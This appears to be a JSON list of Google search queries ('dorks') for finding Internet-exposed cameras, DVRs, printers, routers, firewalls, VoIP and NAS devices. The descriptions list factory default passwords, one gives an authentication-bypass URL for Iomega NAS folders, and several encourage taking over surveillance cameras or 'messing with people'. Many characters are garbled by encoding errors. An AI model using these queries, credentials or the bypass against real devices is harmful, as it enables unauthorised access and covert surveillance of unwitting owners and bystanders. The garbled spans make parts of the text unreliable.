http://[sitename]/admin/aindex.htm."}, {"dork": "intitle:snc-z20 inurl:home/", "description": "sony NC RZ20 cameras, only one result for this cam at the moment, a nice street view from a skyscraper."}, {"dork": "(intext:\"MOBOTIX M1\" | intext:\"MOBOTIX M10\") intext:\"Open Menu\" Shift-Reload", "description": "Mobotix netcams use the thttpd-2.x. server (http://www.acme.com/software/thttpd/). The latest version today is 2.25b, but most cams run older versions. They produce a rather nice image quality.Moderator note: this search was found by L0om and cleaned up by Wolveso."}, {"dork": "intitle:\"WJ-NT104 Main Page\"", "description": "The Panasonic WJ-NT104 allows easy monitoring with a conventional browser. More vendor information is available at hxxp://www.panasonic.ca/English/Broadcast/security/transmission/wjnt104.asp"}, {"dork": "\"powered by webcamXP\" \"Pro|Broadcast\"", "description": "webcamXP PRO:http://www.webcamxp.com/productsadv.htmlThis is the most advanced version of the software. It has all the features of the other versions (including advanced users management, motion detector, and alerts manager) plus remote administration and external server notification when going offline/online."}, {"dork": "intitle:\"Live View / - AXIS\"", "description": "These AXIS cams seem to run their own http server (Boa/0.94.13). The setup button can be hidden. The devices ship with a default password pair (quoting from the FAQ): \"By default, the username will be \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201croot\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2 and the password will be \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cpass\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2. If these are not the current values, performing a factory default on the unit will reset the password to \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cpass\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2.\"Some models found in this search:- AXIS 205 version 4.0x- AXIS 210 Network Camera version: 4.0x- AXIS 241S Video Server version: 4.0x- AXIS 241Q Video Server version 4.0x"}, {"dork": "intitle:\"BorderManager Information alert\"", "description": "This is an Informational message produced by the Novell BorderManager firewall/proxy server. Attackers can located perimeter defence systems with this query."}, {"dork": "\"Phaser 6250\" \"Printer Neighborhood\" \"XEROX CORPORATION\"", "description": "Base Specifications Phaser 6250N: Letter/Legal Size Color Printer 110V, 26ppm Color/B&W (24ppm A4 Color/B&W), 2400dpi, 700MHz Processor, Ethernet, 256MB Memory, Photo Quality Mode, Network Feature SetPassword not allways needed it seems, depends on admin setup.."}, {"dork": "\"Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 740 Color Printer\" \"printer named: \"", "description": "This product is supported but no longer sold by Xerox in the United States. Replacement Product: Phaser\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6250.Configuration pages are password protected."}, {"dork": "\"Phaser 8200\" \"\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 Xerox\" \"refresh\" \" Email Alerts\"", "description": "Brochure info: \"The Phaser 8200 uses solid ink, an alternative technology to laser printing. Unlike typical laser printers, solid ink doesn't require throwaway cartridges to get ink in the printer.\" Using the Internet, your printer can send performance information to our computers. PhaserSMART, our diagnostic system, examines the information, diagnoses the issue, and immediately walks you through a proposed solution. Automatic alerts minimize printer management problems. Alerts notify you via email when it's time to replace supplies, or when service is required.\"Moderator note: you may not be able to connect to the links Google gives if the printers are turned off when not in use."}, {"dork": "\"Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 840 Color Printer\" \"Current Status\" \"printer named:\"", "description": "This product is supported but no longer sold by Xerox in the United States. Support and supplies for this product continue to be available online. Replacement Product: Phaser\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 8400This search finds the PhaserLinkTM Printer Management Software for the Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 840 Color Printer. It seems at least the \"Print DEMO\" page works without authentication."}, {"dork": "intitle:liveapplet inurl:LvAppl", "description": "Canon has a series of netcams that all use the \"WebView LiveScope\" software. They are frequently used by japanese sites. Unfortunately most are crawled by their IP address so determining their location becomes more difficult. Some model names are:* VB-C10* VB-101* VB-C50iThis search looks for the java applet called \"LiveApplet\" that is used by Canon's network camera feeds. There is also a standalone (free) program, that is easier to control and lets you save bookmarks. It's available for PC and MACs. The win32 download is here: http://www.x-zone.canon.co.jp/cgi-bin/nph-wvh35-cs.cgi"}, {"dork": "intext:centreware inurl:status", "description": "More Xerox printers (Phasers 4500/6250/8200/8400). An attacker can access the webinterface with this search."}, {"dork": "intitle:\"dreambox web\"", "description": "this search will show web administration interfaces of linux dream boxes.The Dreambox is one of the popular 3rd generation boxes. Based on a powerful IBM PowerPC (not PC !) with an MPEG1/2 hardware decoder, this box is FULLY open, with an open source Linux operating system. The Dreambox not only offers high quality video and audio, but also has a variety of connections to the outside world: Ethernet, USB, PS2, Compact Flash and two Smartcard readers. The box can handle any dish configuration, an unlimited number of channels or satellites, has a very fast channel scan, allows for direct digital recording, etc."}, {"dork": "intitle:\"Live View / - AXIS\" | inurl:view/view.sht", "description": "More Axis Netcams, this search combines the cams with the default title (Live View) and extends it by searching for the \"view/view.shtml\" URL identifier. Models found with this search are:AXIS 205 version 4.02AXIS 206M Network Camera version 4.10AXIS 206W Network Camera version 4.10AXIS 211 Network Camera version 4.02AXIS 241S Video Server version 4.02AXIS 241Q Video Server version 4.01Axis 2100 Network CameraAxis 2110 Network Camera 2.34Axis 2120 Network Camera 2.40AXIS 2130R PTZ Network Camera"}, {"dork": "intitle:\"The AXIS 200 Home Page\"", "description": "The Axis 200 HOME pages reside within the AXIS 200 device and hold information about the current software version, technical documentation, some howto's and the device settings."}, {"dork": "(\"Fiery WebTools\" inurl:index2.html) | \"WebTools enable * * observe, *, * * * flow * print jobs\"", "description": "Fiery WebTools offers many of the same capabilities of the Command WorkStation\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2, via a Java-enabled Web browser. All job control options such as job merging, edition and previews, as well as information on the status of the jobs are accessible through Fiery WebTools."}, {"dork": "intitle:\"network administration\" inurl:\"nic\"", "description": "This finds Konica Network Printer Administration pages. There is one result at the time of writing."}, {"dork": "inurl:sts_index.cgi", "description": "The Ricoh Aficio 1022 is a digital multifunctional B&W copier, easily upgraded to include network printing, network scanning, standard/LAN faxing and storage capabilities."}, {"dork": "intitle:RICOH intitle:\"Network Administration\"", "description": "Network Administration pages for several Ricoh Afficio printer models, for example the Aficio 1018D and RICOH LASER AP1600."}, {"dork": "intitle:\"lantronix web-manager\"", "description": "The Lantronix web manager home pages show the print server configuration (Server Name, Boot Code Version, Firmware, Uptime, Hardware Address, IP Address and Subnet Mask). The other setting pages are password protected."}, {"dork": "intitle:\"axis storpoint CD\" intitle:\"ip address\"", "description": "Axis' network CD/DVD servers are faster, less costly and easier to manage than using full-blown file servers for networking CD/DVD collections. Any organization that relies heavily on CD/DVD-based information can benefit from an AXIS StorPoint CD+."}, {"dork": "intitle:\"switch home page\" \"cisco systems\" \"Telnet - to\"", "description": "Most cisco switches are shipped with a web administration interface. If a switch is reachable from the internet and google cashed it this search will show it."}, {"dork": "(inurl:webArch/mainFrame.cgi ) | (intitle:\"web image monitor\" -htm -solutions)", "description": "The Ricoh Aficio 2035 (fax/scanner) web interface.Attackers may read faxes and can get information like internal ip addresses.cleanup by: yeseins & golfocleanup date: Apr 28, 2005original dork: inurl:webArch/mainFrame.cgi"}, {"dork": "inurl:netw_tcp.shtml", "description": "An Axis Network Camera captures and transmits live images directly over an IP network (e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera from a Web browser on any computer [..]"}, {"dork": "inurl:TiVoConnect?Command=QueryServer", "description": "Tivo is a the digital replacement for your analog videorecorder. It's a digital media system that amongst other things allows recording tv shows to a hard disk. More information is available at http://www.tivo.com.This search was found in one of those cgi scanning tools out there. Currently there are only two results and only the first responds with information like this:1.0Sat Oct 16 15:26:46 EDT 2004JavaHMO1.0Leon Nicholls-This is an official build. Identifier: 2003.03.25-1612 Last Change: 112792In the future vulnerabilities may be found in this software. For now an attacker can enjoy the mp3 stream it provides (copy the server:port in winamp or xmms)."}, {"dork": "intitle:\"DVR Web client\"", "description": "This embedded DVR is quick plug and play. Just plug it in and it will start recording. You can view all the cameras at once or one at a time. Allows individual pictures to come up on play back or all together. The best feature is the ability to connect via a network and play back existing stored video or view images live.* Four Channel Input* Horizontal Resolution 480 Lines* 16.7 Million Color Output* Display In Quad or Single Image (Full MultiPlex)* Motion Detection* Scheduling* Zoom in Live and Playback* 720H X 480V (Full) 360H X 240V In Quad* 0.1 FPS Thru 15 FPS each camera (60 FPS Total)* Web Interface TCP/IP With Client Software* Back-Up With Mark Image, VCR, Time Lapse, Remote Client Software* Full Remote Camera Controls (PTZ), Alarms, Wiper, Fans, Etc."}, {"dork": "site:.viewnetcam.com -www.viewnetcam.com", "description": "The FREE viewnetcam.com service allows you to create a personal web address (e.g., http://bob.viewnetcam.com) at which your camera's live image can be found on the Internet. How the camera and service works: Special Software embedded within your Panasonic Network Camera gives your camera the ability to locate your unique Internet address. No matter what kind of Internet connection you have or which Internet provider you use, the viewnetcam.com service will keep your camera's Internet address permanent."}, {"dork": "inurl:\"level/15/exec/-/show\"", "description": "This search finds Cisco devices which have level 15 access open via webinterface. If an attacker wants to search for another level he can replace the \"15\" with this level. Levels below 10 need a leading zero (e.g. 04).Currently only the cached pages can be viewed."}, {"dork": "WebControl intitle:\"AMX NetLinx\"", "description": "AMX Netlink is a server appliance which connects various devices like a beamer, laptop or video recorder to the internet."}, {"dork": "intitle:\"Home\" \"Xerox Corporation\" \"Refresh Status\"", "description": "CentreWare Internet Services is an interactive service that uses Internet technology to extend the capabilities of your DocuPrint printer using Internet technology. An HTTP server application developed by Xerox is resident on your network-enabled DocuPrint printer. This HTTP server provides access to advanced services for the installation, configuration, and management of your DocuPrint printer."}, {"dork": "\"intitle:Cisco Systems, Inc. VPN 3000 Concentrator\"", "description": "The Cisco VPN 3000 Concentrator is a remote access VPN. The 'Concentrator' is a piece of hardware that manages a companies VPN's. This google dork searches for the Concentrators login portal for remote access. With the correct username and password an attacker can '0wn' their Concentrator; i.e. be able to delete, copy, read, configure anything on the Concentrator."}, {"dork": "inurl:axis-cgi", "description": "Just another search string to detect the infamous Axis netcams. This company actually changed the generic /cgi-bin/ directory name to /axis-cgi/, making it easier to d0rk them ;)"}, {"dork": "intitle:\"ipcop - main\"", "description": "IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)"}, {"dork": "intitle:\"Smoothwall Express\" inurl:cgi-bin \"up * days\"", "description": "smoothwall is a firewall operating system distribution based on Linux. (Not many results for this search at the moment)."}, {"dork": "inurl:\"ipp/pdisplay.htm\"", "description": "Providing a standout printing solution, Novell iPrint offers secure print services that extend across multiple networks and operating systems\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009dbringing the power of the Net to your business environment. This search locates various online printers."}, {"dork": "axis storpoint \"file view\" inurl:/volumes/", "description": "The Axis Storpoint device turns a SCSI or ATA box with lots of cdrom players (or writers) into a cd tower which can be browsed through any browser. The default admin password combo = root/pass. CD access can be password restricted like in Apache. Axis uses it's own server software. Many vulnerabilities can be found in the security databases like SF."}, {"dork": "intitle:\"AudioReQuest.web.server\"", "description": "Audio ReQuest home CD/MP3 player. Various information about the configuration of the host and surrounding network can be found out by visiting the main page of this server. Beyond that, you could peruse someones MP3 collection!"}, {"dork": "inurl:\":631/printers\" -php -demo", "description": "CUPS provides a portable printing layer for UNIX\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae-based operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. CUPS uses the Internet Printing Protocol (\"IPP\") as the basis for managing print jobs and queues. The Line Printer Daemon (\"LPD\") Server Message Block (\"SMB\"), and AppSocket (a.k.a. JetDirect)."}, {"dork": "intitle:\"Spam Firewall\" inurl:\"8000/cgi-bin/index.cgi\"", "description": "The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization."}, {"dork": "intitle:\"Cayman-DSL.home\"", "description": "Cayman DSL modems. Many Cayman units have a weakness where even if remote administration is disabled, some older firmwares will still allow validation if proper login credentials are supplied. In many cases, simply hitting enter will be enough to authenticate. It's worth noting, many of the vulnerable devices also support telnet right out of the box, as opposed to the linksys models which require a firmware patch."}, {"dork": "Axis Video Manual", "description": "Some of the sites are very, very interesting - try a search substituting site:gov instead of site:com, or try site:edu or site:org or site:fm. \nAnyway, camera servers made by Axis Video, you can look up administrator manuals online via the following search string (guess what you might find there?): site:com inurl:axis video server manuals\nCan you say default UID and PW?\nWhat's really interesting is if you look hard enough; you can find cameras within government and educational labs; airport surveillance; even some stretches of I65 in the US (for those of you close to the Ohio River area).\nAnyway this search string gets you into the server; from there you can have many controls or few controls over the cameras (including zoom, pan, and iris). There is much to see and most of the cameras have easy access to admin profile via click of a button - of course from there you have to provide a UID & PW. But read up on the manuals any you may get lucky.\nBottom line, if you can control the camera (via admin priv.) you can control what and when the camera & server view as well as what & when they record. Just a small seed for a possibly big idea - your ambitions may vary.\nRate it! Give me feedback! I will not learn without some form of criticism...yet despite how insignificant that criticism may make me feel...i enjoy the search for the unseen/unknown knowledge nonetheless...it was worth it."}, {"dork": "intitle:\"Sipura.SPA.Configuration\" -.pdf", "description": "Query returns configuration pages for online Voice over IP devices. Discloses an obscene amount of information about the target, including most all routing information and access to control user's telephone system."}, {"dork": "filetype:cgi transcoder.cgi", "description": "Digital Video Recorder by SnapStream. It is possible on misconfigured machines to stream video off these devices."}, {"dork": "intitle:\"Setup Home\" \"You will need * log in before * * change * settings\"", "description": "This should reveal Belkin routers. Interestingly, Belkin routers by default have remote administration on, and act as a webserver for administration. Also by default, their password is blank (and the login page helpfuly informs the attacker of this).Once he's in, there's all kinds of annoying stuff he could get into, and it could also be used more blackhackishly to disable security."}, {"dork": "allinurl:index.htm?cus?audio", "description": "This will find webcams made by Sweex, Orite and others. Supports motion detection, ftp, smtp and save to .avi. Needs ActiveX so works for IE/win only .."}, {"dork": "inurl:\"8003/Display?what=\"", "description": "Norton AntiVirus for GatewaysEasily administered from anywhere via an HTML interface, it scans compressed and encoded files at the SMTP gateway, including a nearly unlimited number of file extensions in ZIP\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae, UUENCODE, and MIME formats. Administrators have flexible options for handling infected files, scheduling virus definition updates via LiveUpdate\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2, and generating reports."}, {"dork": "intitle:\"EverFocus.EDSR.applet\"", "description": "The new EDSR-1600 (16-channel), EDSR-900 (9-channel) and EDSR-600 (6-channel) digital video recorders offer all digital video recording benefits and are easy to install and operate like a custom VCR. Moreover, the 16 & 9 channel devices are the first Digital Video Recorders with an integrated 16x4 basic matrix function. Existing multiplexers can be connected via a switch output. Alarms are managed via external alarm inputs and outputs."}, {"dork": "inurl:na_admin", "description": "This searches for the admin pages for a \"Network Appliance\" box. An authenticated user could get access to a their data - all of it, in fact up to 100's Tb of it. This is also part of cgi scanning tools like: http://www.cirt.net/nikto/UPDATES/1.34/scan_database.db"}, {"dork": "intitle:\"Connection Status\" intext:\"Current login\"", "description": "This is an intriguing way of finding various '5861 DMT Routers' - the presence of a web-interface to the router also indicates the presence of a telnet interface to the router!"}, {"dork": "intitle:\"DEFAULT_CONFIG - HP\"", "description": "High scalable Ethernet switches by HP running in the default configuration"}, {"dork": "intitle:\"supervisioncam protocol\"", "description": "\"SupervisionCam captures and compares images from video cameras, (internet) image files or the computer screen at intervals you define. It starts optional activities when a movement is detected.\""}, {"dork": "allintitle:Brains, Corp. camera", "description": "mmEye webcam / cam servermmEye is a multifunction multimedia server equipped with 32bit RISC CPU SH-3, and runs UNIX operating system (NetBSD).It has video input ports (1 S signal port, 2 composite signal ports) and PCMCIA Type II slots built in."}, {"dork": "intitle:\"Dell Laser Printer\" ews", "description": "Finds Dell's printers with EWS.EWS : Embedded Web Server technology enables the usage of a standard web browser to manage many aspects of the printer, for example, view consumable life, configure network parameters, view serial number information, printer usage etc.."}, {"dork": "intitle:asterisk.management.portal web-access", "description": "Coalescent Systems Inc. launched The Asterisk Management Portal project to bring together best-of-breed applications to produce a \"canned\" (but fully functional) turn-key small business phone system based on The Asterisk Open Source PBX."}, {"dork": "intitle:\"BorderWare MXtreme Mail Firewall Login\"", "description": "BorderWare MXtreme Mail firewallMXtreme is a hardened appliance with a highly robust mail transfer agent (MTA) and email gateway that prevents email-borne threats from entering your network while protecting against spam and viruses."}, {"dork": "intitle:\"OfficeConnect Cable/DSL Gateway\" intext:\"Checking your browser\"", "description": "This query allows you to find OfficeConnect Cable/DSL Gateways, by locating the browser-check page that Google has indexed. The browser-check page leads to a login page, which kindly informs you of the default password."}, {"dork": "\"About Winamp Web Interface\" intitle:\"Winamp Web Interface\"", "description": "Just a bit of fun, should reveal a few instances of a Winamp HTTP control program. Without login, you can't do much except see the currently playing track. With login you can have a bit more fun by changing the volume, currently playing track, viewing playlists, etc. With admin access you can delete tracks... I'll leave it to others to find out if anything cool can be done with this.Just a note, you *can't* hear the music the person is playing, it's not a stream interface, just a control interface."}, {"dork": "intitle:\"NeroNET - burning online\"", "description": "NeroNet is an online burning device by Nero. Basically with this query you'll get a listing of active servers running the software. You can only do things like view active jobs users and the see what disc the server is burning on. However if you manage to log in as the Administrator you can have a bit more fun like change the server and recording settings. Well they were smart enough to convienently place the default password located within the softwares manual."}, {"dork": "intitle:\"Freifunk.Net - Status\" -site:commando.de", "description": "Hacked WRT54G Freifunk firmware. The router is based on Linux so after the GPL the source code must be published. some guys from freifunk.net have modified it for their needs."}, {"dork": "inurl:\"port_255\" -htm", "description": "Another way to dig up some not yet dorked Lexmark and a couple of Dell printers.http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2177"}, {"dork": "intext:\"Powered by: Adobe PrintGear\" inurl:admin", "description": "Printers equipped with Adobe's PrintGear technologyAdobe's PrintGear technology is a new printing architecture designed specifically for low-cost, high-quality output. At the core of this architecture is a custom chip, the PrintGear Imaging Processor (or PrintGear processor for short). This processor supplies the performance required for high-resolution output, yet helps keep the overall cost of the output device low."}, {"dork": "intitle:\"--- VIDEO WEB SERVER ---\" intext:\"Video Web Server\" \"Any time & Any where\" username password", "description": "AVTech Video Web Server is a surveillance producted that is directly connected to the internet It could enable the AVTech DVR series products or any camera to connect to Internet for remote monitoring or remote control. Besides, it could also enable 2 video input to connect to Internet for remote monitoring and recording. Besides the web interface it also offers an ftp server."}, {"dork": "inurl:start.htm?scrw=", "description": "VPON (Video Picture On Net) is a video surveillance setup which seems to be used by a lot of businesses. In the FAQ posted on their site (http://www.aegismicro.com/navigation/indexsuppfaq.htm) they show a default username/password of webmonitor/oyo.=)"}, {"dork": "inurl:\"S=320x240\" | inurl:\"S=160x120\" inurl:\"Q=Mob", "description": "Mobile cameras? Not sure what camera type this is for but they are all from Asia and no password is required to view them.. multiple cams and camera views. The &N=* at the end of the URL changes the language of the camera control links, &N=0 is english.This is a slightly modified version of WarChylde's query, which gives more results."}, {"dork": "intitle:\"AXIS 240 Camera Server\" intext:\"server push\" -help", "description": "This search finds AXIS 240 Camera Servers (as opposed to just the cameras) which can host many cameras, that may not be found in other searches, since they are not necessarily IP based."}, {"dork": "intitle:\"TANDBERG\" \"This page requires a frame capable browser!\"", "description": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously."}, {"dork": "intitle:\"Middle frame of Videoconference Management System\" ext:htm", "description": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously."}, {"dork": "intitle:\"Veo Observer Web Client\"", "description": "Another online camera search. This one uses ActiveX thingies, so you need a M$ browser. Append \"LGI_en.htm\" to the URL for the english version. The embedded webserver is called Ubicom/1.1. Defaults are admin/password. The manual very cleary warns owners to change that."}, {"dork": "intitle:\"Java Applet Page\" inurl:ml", "description": "Another Standalone Network Camera.Default Login: remove wg_jwebeye.ml to get a nice clue ..Server: wg_httpd/1.0(based Boa/0.92q)"}, {"dork": "intitle:\"WEBDVR\" -inurl:product -inurl:demo", "description": "DVR is a generic name used to describe the recording process with a digital cam (digitial video recording). This search finds several manufactors like Kodicom DVR Systems, i3 DVR, and others I can't identify."}, {"dork": "intitle:\"V1\" \"welcome to phone settings\" password", "description": "This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.Depending on the version of firmware preinstalled on your IP Box, the password to get into the setting pages may be either 12345678 or 87654321."}, {"dork": "intitle:\"HP ProCurve Switch *\" \"This product requi", "description": "HP ProCurve Switch web management pages, found by their [noscript] html tags. Please note: this search only gives results from certain source IP addresses and I can't tell you why (check forum topic number 2609 for details)."}, {"dork": "\"Summary View of Sensors\" | \"sensorProbe8 v *\" | \"", "description": "sensorProbe is a SNMP enabled and Web based Environmental Monitoring Device. The sensors attached to this device can monitor temperature, humidity, water leakage and air flow, etc. It does support other sensors which can monitor voltage drop, security, analog and dry contacts. The sensorProbe monitors your equipment's environmental variations, and alerts you through \"Email , SMS or SNMP Alerts in your Network Management system\" in advance and prevent any disaster."}, {"dork": "intitle:\"INTELLINET\" intitle:\"IP Camera Homepage\"", "description": "This googledork finds INTELLINET ip cameras. They are used to monitor things and have a web interface. Most of the pages load with the default username and password of guest. The user manual says that the default admin username/password is admin/admin. At the time of posting this googledork had 10 results. p.s. This was discovered by jeffball55 and cleaned up by golfo"}, {"dork": "intitle:\"NetCam Live Image\" -.edu -.gov -johnny.ihackstuff.com", "description": "This is a googledork for StarDot netcams. You can watch these cams and if you have the admin password you can change configurations and other settings. They have a default admin name/pass but I haven't taken the time to figure it out."}, {"dork": "intitle:\"netbotz appliance\" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces", "description": "Netbotz devices are made to monitor video, temperature, electricity and door access in server rooms. These systems usually have multiple cameras. The information by itself might not be very dangerous, but someone could use it to plan physical entrance to a server room. This is not good information to have publicly available."}, {"dork": "Phaser numrange:100-100000 Name DNS IP \"More Printers\" index help filetype:html | filetype:shtml", "description": "This is a search for various phaser network printers. With this search you can look for printers to print test/help pages, monitor the printer, and generally mess with people."}, {"dork": "Display Cameras intitle:\"Express6 Live Image\"", "description": "Express6 live video controller.Displays video from \"Netlive Cameras\" found in this search:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1416Several new cameras found in this search."}, {"dork": "intitle:\"Snap Server\" intitle:\"Home\" \"Active Users\"", "description": "This an online device, you can search for unpassworded shares on Snap Appliance Server.Moderator notes:This was found by golfo on sep 8th, but he forgot to submit it (ouch).. Before that mlynch was the first to discover it. See:http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2784&highlight=snap+serverhttp://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=180"}, {"dork": "intext:\"Welcome to Taurus\" \"The Taurus Server Appliance\" intitle:\"The Taurus Server Appliance\"", "description": "Celestix Networks, Inc., the premier supplier of network server appliance, announces the Taurus(TM) Server Appliance, the all-in-one networking solution for the small to midsize business. The Taurus(TM) Server Appliance offers no compromise on functionality and scalability, and provides optimum efficiency at a lower price than traditional servers.With a single purchase, up to 250 users have integrated file and peripheral sharing, high-speed Internet access, email, scheduled back-up, VPN and secure firewall, anti-virus engine, and Intranet. Standard with built-in networking software and optimized applications, the Taurus(TM) supplies up to 40-GB of Internal storage. Seperate Admin and root password. Root password must be changed from the command prompt which means most Sysadmins won't change it from Default. Manuel hosted by the device no password needed."}, {"dork": "inurl:setdo.cgi intext:\"Set DO OK\"", "description": "Dcs-2100 camerasBy removing \"intext:Set DO OK\" you will get more hits but they will require a login. Set DO OK is almost always admin access, you will need to go to the root of the URL to use the camera."}, {"dork": "http://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&filter=0", "description": "This is the web interface for Alcatel's Omniswitch. Default login is: admin/switch."}, {"dork": "intitle:\"WxGoos-\" (\"Camera image\"|\"60 seconds\" )", "description": "This is used in serverrooms and such where climate conditions are crucial to hardware health. If an attacker were to guess the password for the configuration page, then he can find POP3 passwords in plain text in the HTML source code.It runs on \"I.T. Watchdogs, Inc. Embedded Web Server\""}, {"dork": "intitle:\"Device Status Summary Page\" -demo", "description": "hxxp://www.netbotz.com/products/index.htmlNetwork/server/room security and enviromental alarm device.O yea, they have cameras on them, fun to watch IT people...... wooIncludes:Temperature (\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00b0F)Humidity (%)Air Flow (ft/min)Audio Alarm:Door Switch:"}, {"dork": "intitle:\"iGuard Fingerprint Security System\"", "description": "vendor:http://www.iguardus.com/dome information disclosure: employeers list & free camera access"}, {"dork": "intitle:\"SNC-RZ30\" -demo", "description": "This search will reveal Sony's SNC-RZ30 IP camera's web interface. Quite a few of these cameras have not been configured to deny you control. These are not only cameras in the US but may include cameras abroad.Including: University Security CamerasForeign government camerasI've seen cameras monitoring submarines.You may also use this in place of SNC-RZ30, but they don't yield as many results.SNC-CS3 SNC-RZ25SNC-DF40 SNC-RZ30SNC-DF70 SNC-VL10SNC-P1 SNC-Z20"}, {"dork": "intitle:\"BlueNet Video Viewer\"", "description": "Near broadcast quality video over the internet. A full 30fps at the 320 X 240 size. 12fps at the 640 X 480 size. The BlueNet video server will accept virtually any type of camera, wireless receivers, DVRs, multiplexes, etc. Display and access any security system live from anywhere in the world utilizing the web. All you need is an Internet browser to view the image. Uses ActiveX."}, {"dork": "intitle:\"stingray fts login\" | ( login.jsp intitle:StingRay )", "description": "The Stingray File Transfer Server: Open communication regardless of platform, protocol or location. Independant of operating system architecture and the type of communication line, StingRay enables fast and simple file transfer.Login= user:(no password) or admin:stingrayPS: only 1 result now."}, {"dork": "allintitle:\"DVR login\"", "description": "softwell Technology \"Wit-Eye\" DVR.Default user/pass is admin:adminRequires ActiveX"}, {"dork": "\"Welcome to the CyberGuard unit!\"", "description": "\"Welcome to the CyberGuard unit! To begin configuring your CyberGuard unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)"}, {"dork": "\"SnapGear Management Console\" \"Welcome to the SnapGear Unit!\" -pdf", "description": "\"Welcome to the SnapGear Unit! To begin configuring your SnapGear unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)PS: this software looks very much like Cyberguard."}, {"dork": "intitle:\"Your Network Device\" Status (LAN | WAN)", "description": "Login page for the Solwise Sar715+ ADSL Router from solwise.co.uk. Thanks to jeffball55 for the identification of this \"victim\" ;)"}, {"dork": "intitle:\"Net2Phone Init Page\"", "description": "Net2Phone CommCenter\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is software that allows you to make phone calls and send faxes to anywhere in the world."}, {"dork": "intitle:Top \"Vantage Service Gateway\" -inurl:zyxel", "description": "VSG1200 Vantage Service Gateway (topframe), go up one level for the login page. Vendor page at h**p://www.i-tech.com.au/products/7828_ZYXEL_VSG_1200_Vantage_Service_Management.asp"}, {"dork": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "description": "This search identifies EvoCam cameras accessible over the Internet. There are also public exploits that target these cameras: https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=evocam&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=\r\n\r\n\r\n\r\nAuthor: Airloom"}, {"dork": "inurl:\":9000\" PacketVideo corporation", "description": "inurl:\":9000\" PacketVideo corporation\nAbout: This provides Twonky Server Media interface. You can find images, music, videos etc.\nSubmitter: Ishaan P"}, {"dork": "allintitle:\"UniMep Station Controller\"", "description": "UniMep is a device for managing fuel station. You can see process of\nfueling cars and you can make some changes in the setting.\nThe default username/password is admin/setup. Author: WBR rigan"}, {"dork": "inurl:/cgi-bin/makecgi-pro", "description": "Brings up listings for Iomgea NAS devices.\nPassword protected folders are susceptible to authentication bypass by\nadding the following to the url (after /cgi-bin/make-cgi-pro):\n?page_value=page_files&tab_value=%20&task_value=task_gotoPath¶m1_value=(foldername)\nCommon folders are music, movies, photos & public. Author: Matt Jones"}, {"dork": "intitle:SpectraIV-IP", "description": "Google dork for pelco SpectraIV-IP Dome Series cameras\nDefault username/password \"admin/admin\". Author: GhOsT-PR"}, {"dork": "inurl:Settings.aspx intitle:Beyond TV", "description": "Beyond TV gives you the capability to turn your PC into a high quality,\ndigital video recorder (DVR). Most people use it for cable TV so that\nthey don't have to spend rent money on a low end quality hardware DVR\nfrom their cable company. It's default config has no password or\nusername enabled. Very bad for people who connect their PCs directly to\ntheir modems. I have Beyond TV and I was curious on 